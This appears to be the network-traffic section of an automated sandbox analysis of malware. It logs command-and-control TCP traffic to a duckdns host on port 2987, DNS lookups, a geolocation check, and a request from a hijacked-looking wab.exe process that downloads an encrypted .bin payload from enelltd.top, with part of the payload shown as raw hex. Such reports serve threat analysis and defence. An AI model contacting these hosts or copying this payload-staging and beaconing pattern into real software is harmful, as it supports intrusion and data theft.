                                                    May 3, 2024 09:43:55.338946104 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.338994980 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.339010954 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.339049101 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.339095116 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.339124918 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.339165926 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.339210033 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.339222908 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.339332104 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.339373112 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.339523077 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.339574099 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.339624882 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.339688063 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.339754105 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.339798927 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.339811087 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.339977026 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340017080 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.340040922 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340151072 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340190887 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.340226889 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340325117 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340363026 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.340399027 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340507030 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340545893 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.340573072 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340651035 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340699911 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.340718031 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340800047 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340841055 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.340866089 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340923071 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.340962887 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.340990067 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341058969 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341099024 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.341135025 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341187000 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341228962 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.341267109 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341321945 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341360092 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.341382980 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341430902 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341464996 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.341521978 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341562986 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341603994 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.341620922 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341691017 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341728926 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.341753960 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341806889 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341850042 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.341866970 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341942072 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.341981888 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.342006922 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342112064 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342159033 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.342183113 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342256069 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342292070 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342302084 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.342386007 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342427015 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.342442036 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342479944 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342524052 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.342554092 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342628956 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342673063 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.342700005 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342817068 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.342854977 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.342871904 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343044996 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343086958 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.343142986 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343223095 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343266964 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.343342066 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343436956 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343481064 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.343487978 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343617916 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343660116 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.343686104 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343785048 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343823910 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.343861103 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343934059 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343975067 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.344038010 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344110012 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344151020 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.344219923 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344312906 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344356060 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.344357967 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344413996 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344451904 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.344470978 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344484091 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344518900 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.344558001 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344629049 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344665051 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.345040083 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.345154047 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.345237017 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.345247030 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.345354080 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.345402002 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.345506907 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.345612049 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.345652103 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.345778942 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.345885038 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.345927000 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.345973969 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.346067905 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.346107960 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.346132040 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.400783062 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.430144072 CEST8049741178.237.33.50192.168.2.4
                                                    May 3, 2024 09:43:55.430200100 CEST4974180192.168.2.4178.237.33.50
                                                    May 3, 2024 09:44:25.032540083 CEST2987149739193.222.96.21192.168.2.4
                                                    May 3, 2024 09:44:25.135230064 CEST4973929871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:44:26.366244078 CEST4973929871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:44:26.583239079 CEST2987149739193.222.96.21192.168.2.4
                                                    May 3, 2024 09:44:57.206052065 CEST2987149739193.222.96.21192.168.2.4
                                                    May 3, 2024 09:44:57.260282993 CEST4973929871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:44:57.355274916 CEST4973929871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:44:57.586834908 CEST2987149739193.222.96.21192.168.2.4

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 3, 2024 09:43:49.102766037 CEST5166953192.168.2.41.1.1.1
                                                    May 3, 2024 09:43:49.197503090 CEST53516691.1.1.1192.168.2.4
                                                    May 3, 2024 09:43:53.027424097 CEST6528253192.168.2.41.1.1.1
                                                    May 3, 2024 09:43:53.129843950 CEST53652821.1.1.1192.168.2.4
                                                    May 3, 2024 09:43:53.999231100 CEST6020653192.168.2.41.1.1.1
                                                    May 3, 2024 09:43:54.088813066 CEST53602061.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    May 3, 2024 09:43:49.102766037 CEST192.168.2.41.1.1.10xe42fStandard query (0)enelltd.topA (IP address)IN (0x0001)false
                                                    May 3, 2024 09:43:53.027424097 CEST192.168.2.41.1.1.10xf818Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                                    May 3, 2024 09:43:53.999231100 CEST192.168.2.41.1.1.10x3d91Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    May 3, 2024 09:43:49.197503090 CEST1.1.1.1192.168.2.40xe42fNo error (0)enelltd.top172.67.215.46A (IP address)IN (0x0001)false
                                                    May 3, 2024 09:43:49.197503090 CEST1.1.1.1192.168.2.40xe42fNo error (0)enelltd.top104.21.45.139A (IP address)IN (0x0001)false
                                                    May 3, 2024 09:43:53.129843950 CEST1.1.1.1192.168.2.40xf818No error (0)learfo55ozj02.duckdns.org193.222.96.21A (IP address)IN (0x0001)false
                                                    May 3, 2024 09:43:54.088813066 CEST1.1.1.1192.168.2.40x3d91No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • enelltd.top
                                                    • geoplugin.net

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449741178.237.33.50806544C:\Program Files (x86)\Windows Mail\wab.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 3, 2024 09:43:54.257086992 CEST71OUTGET /json.gp HTTP/1.1
                                                    Host: geoplugin.net
                                                    Cache-Control: no-cache
                                                    May 3, 2024 09:43:54.430488110 CEST1173INHTTP/1.1 200 OK
                                                    date: Fri, 03 May 2024 07:43:54 GMT
                                                    server: Apache
                                                    content-length: 965
                                                    content-type: application/json; charset=utf-8
                                                    cache-control: public, max-age=300
                                                    access-control-allow-origin: *
                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                    Data Ascii: { "geoplugin_request":"191.96.227.219", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449738172.67.215.464436544C:\Program Files (x86)\Windows Mail\wab.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-03 07:43:49 UTC177OUTGET /XpMumnKrmZynRk242.bin HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                    Host: enelltd.top
                                                    Cache-Control: no-cache
                                                    2024-05-03 07:43:49 UTC845INHTTP/1.1 200 OK
                                                    Date: Fri, 03 May 2024 07:43:49 GMT
                                                    Content-Type: application/octet-stream
                                                    Content-Length: 494656
                                                    Connection: close
                                                    Last-Modified: Thu, 02 May 2024 12:12:55 GMT
                                                    ETag: "66338347-78c40"
                                                    Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                    Cache-Control: max-age=315360000
                                                    CF-Cache-Status: HIT
                                                    Age: 66005
                                                    Accept-Ranges: bytes
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QRCxNyy3%2BHvmMUSfupOiywGWGzJOuhj6D%2BtLdwCZq0jq%2FKwDR2hNdjqbpMp9WN8U55oHa1ivpK%2BLUXT1%2FlPQAQ3TUuEsyB8VMMvWfW1hCYluMXzPNOjwMTt10u6J3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                    X-Content-Type-Options: nosniff
                                                    Server: cloudflare
                                                    CF-RAY: 87de9f4f0c251a3c-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-03 07:43:49 UTC524INData Raw: 44 db e4 aa d7 31 2e 25 b7 8e e2 cf e4 69 3e 7b 32 bc f4 12 1a 10 fb b6 7d 1b 73 4d fe dd 77 6d de 33 36 65 38 20 22 10 3e 54 c2 0f 1d 5b 58 47 9e 8b cf c9 15 2b 7d 19 20 6e eb 99 6f 71 5a ce 89 33 9f 63 b4 2b 0b c5 a5 40 dd c0 22 8f ba d4 27 84 bd 52 3d 21 d8 7a 28 5a 52 6b 56 e0 d5 4c f6 47 77 78 e4 50 f3 cc 22 72 26 fd 59 f2 45 2b 9b dd f2 83 87 33 c1 17 f4 ba 11 a3 d0 2e a2 ae f3 1e 69 ff ad a1 61 88 5d 96 63 89 80 2a 1f 77 31 3f 73 12 c3 10 0e d8 ef 99 96 df f8 b8 cb 47 52 0c 7d 54 3e 1b 29 7e 1b 2d 53 09 ed c1 5f d7 02 67 11 3e 2e 7a 30 04 4e f2 fc dd 74 fb e1 a1 7a 0e a1 77 93 54 08 c7 91 bf 3e fe 81 7b 80 fd 8f 6a d0 8e be 0f 58 41 ba 1b be c8 43 a8 84 38 1c e4 37 38 5d fd ae f8 c4 8f 5e a6 b7 b5 1c 67 85 6f a9 8b d7 b8 aa 36 76 6a 2a 58 55 7f 95
                                                    Data Ascii: D1.%i>{2}sMwm36e8 ">T[XG+} noqZ3c+@"'R=!z(ZRkVLGwxP"r&YE+3.ia]c*w1?sGR}T>)~-S_g>.z0NtzwT>{jXAC878]^go6vj*XU
                                                    2024-05-03 07:43:49 UTC1369INData Raw: 05 35 ad b7 e8 f0 48 bf c0 b7 14 16 32 d0 f0 bb f2 73 4d 85 13 44 d7 f9 b7 b7 3d 91 42 07 e9 95 fb 2b 45 eb d5 e7 e5 b1 3f 2d 5e 96 97 6b bf 84 90 78 d3 09 42 03 4a 18 84 c6 e8 06 81 39 e6 f7 9f dd cf 55 5a 16 54 eb 02 a3 f8 b0 bf 5e 23 ee 6c 5c e8 54 38 f9 74 51 da cf 30 30 c7 98 e8 d5 4a 9c 91 56 2f 76 64 e8 8e 49 10 e4 0c b3 ef 2e b5 1f de 42 dc 48 df ac 7c 0a ec ad 76 1c 00 22 62 0a ad ad 96 6f 01 3b 9d da 18 8e 25 c2 21 1f 71 6e 52 54 c8 0b dc 09 33 ab cc 82 38 43 50 79 e8 bd 6d 19 ec 16 6d f6 74 2e fd 85 61 03 e9 00 28 6e c5 50 65 5b f0 9d 5e 23 56 b0 61 84 da ab 1b cc e8 37 9e f2 99 f2 48 03 04 69 70 05 57 88 38 e6 14 c9 62 77 1c cc 74 80 c8 d1 99 b0 91 93 f6 b2 40 8a cb 48 ef 59 aa be 9b b1 da 94 10 74 ab 80 73 d9 64 2c 6c 06 b7 17 bc 3c 47 74 e7
                                                    Data Ascii: 5H2sMD=B+E?-^kxBJ9UZT^#l\T8tQ00JV/vdI.BH|v"bo;%!qnRT38CPymmt.a(nPe[^#Va7HipW8bwt@HYtsd,l<Gt
                                                    2024-05-03 07:43:49 UTC1369INData Raw: 25 bf 92 73 5c c5 35 2e ca b8 7f 4e 2a 54 19 02 60 93 4d 49 de 85 3f 16 d2 71 2b 64 9e 48 8b 22 50 13 47 a4 6b f9 9a 7f 3c 94 5a dc 55 5f d6 f7 a2 06 ce 7b e0 1c 05 b8 dd 6d 0d 03 0e 96 80 1b 67 59 57 eb ff f3 02 e5 21 47 e2 28 a5 1b 6d 46 e8 4e f0 be 50 0d 3b f2 99 c6 e3 99 bc 6b dc f9 05 35 c5 76 bc 66 4e 57 07 84 17 16 13 c0 4f a3 e4 34 4d 6d 51 49 d7 f9 df 7c bd d4 42 7f 25 a6 04 2f 1c 28 3c 88 de b0 3f 47 5e 2f a7 3d f8 84 78 45 e0 09 42 6b 9f 98 c1 c6 00 aa 9c 4e 83 d6 28 b7 cf ec 7f 3f 16 eb ea 96 cb b0 bf 44 f9 6e 29 58 00 c0 0b fa 74 08 19 76 d0 66 80 98 00 97 19 9d 91 5e e8 84 45 89 12 56 23 e7 ba 93 2d 97 2d d8 9c 42 34 1e ad ad 7c 14 1a 2d 33 1c e8 4a 51 09 ad f4 55 07 31 f3 9b da 70 8e c3 e0 40 94 05 1e c0 11 8c 06 23 1c 8f 29 8e 82 9b d9 07
                                                    Data Ascii: %s\5.N*T`MI?q+dH"PGk<ZU_{mgYW!G(mFNP;k5vfNWO4MmQI|B%/(<?G^/=xEBkN(?Dn)Xtvf^EV#--B4|-3JQU1p@#)
                                                    2024-05-03 07:43:49 UTC1369INData Raw: ad 70 fc da ed 8c 17 6c 35 1f f4 6d 37 cd 8f 84 a2 b0 5d 04 65 e2 53 ca 26 3e 1e ee 0e 5c 42 bd 81 f3 b6 9d 78 c2 de 33 c9 45 fd f9 0d 1c 1f 74 60 5f 9f f0 02 3d ba ee c9 be f2 e7 5e aa 3f 5b e4 a7 5e 9f da 64 46 2c 9b d6 f8 64 71 36 9e f5 4e d7 8b 1c bf 62 32 92 ef d9 20 ff 95 69 aa e9 24 58 4c 09 5d c5 5d 37 77 79 55 e1 11 61 6f 0c b2 9f 1c 98 bf c2 3f ad b3 69 2f f7 b3 eb f4 52 84 90 25 90 d1 a1 8e fb 85 04 56 9e 55 b7 0e 44 42 48 e1 d6 ed d5 21 84 d2 59 0e 55 3d 75 15 6e ca 49 90 ab ff 1b da 80 4b 55 e2 37 0f 19 6d 23 93 59 23 be 09 ce b9 8c 27 5e b6 8e ea 39 34 87 42 35 20 3b 18 9b 4e bf d8 5f f1 03 4a 03 af 30 62 fe c1 a1 8f 44 d7 f9 5f f1 28 91 42 ce 67 45 8a a3 61 6b d5 e7 e5 59 99 38 5e 96 ce e0 6f 09 dc 5c b7 e1 69 16 4a 18 dd 4d 38 8b e3 69 cb
                                                    Data Ascii: pl5m7]eS&>\Bx3Et`_=^?[^dF,dq6Nb2 i$XL]]7wyUao?i/R%VUDBH!YU=unIKU7m#Y#'^94B5 ;N_J0bD_(BgEakY8^o\iJM8i
                                                    2024-05-03 07:43:49 UTC1369INData Raw: fe 4f 44 55 77 1d 53 03 9c 42 7f c5 df ea ec cf 1e 84 40 a6 da ed 68 9b 89 0c 1a c5 f7 a0 45 2b 00 14 1c 1e 50 7c a4 f2 95 09 0f e7 13 c3 48 7d 71 77 b7 42 f2 e4 7a a5 e3 94 b0 99 f4 2a 23 3a 63 fe 52 ab 5f 48 1b 98 94 a8 4c 7a 1a 06 33 29 2d b5 4a 52 89 6e 78 42 24 98 d3 c2 8e 7a 7a 0e 94 8a d0 9d 4e 43 6b 18 ee b7 5e 55 c8 cf 8f d5 03 e2 a2 31 a5 b6 3b 74 09 40 09 7a 1d b4 89 da a6 e3 dd 0b a8 a9 99 6d bd f9 d5 21 4a 97 86 17 d4 99 12 f3 6a 0d 4e ff ed 5e 7d 0b 2b b8 ed c3 e4 89 76 9c da 56 01 78 e1 c5 18 fd b8 f4 9a 7e e3 17 a4 a2 bc ae db 4c 69 a3 21 47 52 5c 6c 01 cd db 92 7a 5c 94 0e e1 1d 74 1a 56 af 38 57 45 39 db 3a 41 16 c0 3f fe 1d 94 dd 66 f6 eb 8f a7 24 d9 e1 f5 94 f9 92 37 4b 04 8e 99 55 b7 d5 f2 4a 6f b7 d6 60 00 8e 9e 3a 30 0c 03 57 d6 ea
                                                    Data Ascii: ODUwSB@hE+P|H}qwBz*#:cR_HLz3)-JRnxB$zzNCk^U1;t@zm!JjN^}+vVx~Li!GR\lz\tV8WE9:A?f$7KUJo`:0W
                                                    2024-05-03 07:43:49 UTC1369INData Raw: 69 03 15 dd 5c 4c 00 37 e7 28 e2 d6 aa e0 3d 65 12 19 4d 6c 22 2c 1f ba f6 e2 93 93 46 44 35 5a 8a 66 eb 09 90 f7 fe 53 41 26 b6 c1 82 17 01 22 8b ab 6a 6a 9e 48 e7 a5 24 fe 35 ee 2b ba 14 03 0d 8d be ab 9b c1 09 0f 1a 7e 7d b4 8d 2b 70 75 51 ad ae 16 08 88 1d 46 0b 5e 2b 0d 4e e5 8e 26 01 b0 42 d1 bb 5a b6 f5 9d c1 59 48 18 01 14 bd f9 7a bf 2d af ee b2 34 18 79 2d b1 aa 5e ba 1c 76 fb 9e ea 05 83 91 b9 ea 4e 84 d7 6c 87 b6 38 f8 de 23 84 4b 1b 6d 63 bc c9 eb 31 d0 89 2b 6c 00 fa f3 39 fe fe 6f 9c 38 75 21 53 5d 06 1b 7d 84 c9 5a 13 0d 98 63 a6 8b c1 8d a9 5b be 06 89 18 a0 1c 75 66 9a 41 d6 aa 6c 5b 4b 49 75 fb 9b 37 e4 b5 88 69 9c 7c 2d a6 00 b1 ed aa 4b fb 15 46 ff be a3 23 67 d9 63 c9 68 ac f7 b6 65 2d 63 da fa 57 18 15 0e c5 ab 94 0d cd 07 b5 f0 65
                                                    Data Ascii: i\L7(=eMl",FD5ZfSA&"jjH$5+~}+puQF^+N&BZYHz-4y-^vNl8#Kmc1+l9o8u!S]}Zc[ufAl[KIu7i|-KF#gche-cWe
                                                    2024-05-03 07:43:49 UTC1369INData Raw: 37 ae 63 ca 99 da 2b a0 4f 2d 09 c4 28 b7 e6 cc 9f e7 a6 4c 0a 81 0f 67 b7 2b c7 ad ed 1e 9b c0 35 ad 93 d7 9f 48 3e 2e 19 25 d8 29 e3 83 26 42 be 68 2c b3 09 7e 33 5c ec 22 ed 9a a9 b9 ce 87 a0 0d ba a0 50 56 02 6b ef ca 3e e8 f7 8a 2a d7 e4 23 fc d8 f9 b1 d2 1a af 27 a8 1e be 2a 62 93 1a 80 b2 f7 a4 48 53 62 3a 0b 4d a6 05 3b 8d 7a eb 8e 4d a3 d8 d3 e0 08 2e 1a 4f 9b f4 ac 0f d0 56 71 87 38 90 38 23 b3 99 74 3d 0e 81 c0 7c a1 50 eb e1 d5 69 16 e4 4a a8 b4 56 76 31 56 12 7f 36 0a 9a 08 73 37 04 ff a7 33 dd 55 47 95 0b 4c 53 ad ba 4a 65 74 65 4c 5d 8c b4 6e 95 0d 0f d8 7b b9 96 16 c6 f5 e5 37 95 42 97 04 6c 31 03 eb 52 0e ac f7 32 8d f2 24 76 78 59 3b 29 c5 7c 28 ae 60 be f8 43 7c 91 bb cf 5e e7 04 f8 78 23 3b b7 9e 23 de 59 1b 6d 65 bb ca 3b 16 89 4b af
                                                    Data Ascii: 7c+O-(Lg+5H>.%)&Bh,~3\"PVk>*#'*bHSb:M;zM.OVq88#t=|PiJVv1V6s73UGLSJeteL]n{7Bl1R2$vxY;)|(`C|^x#;#Yme;K
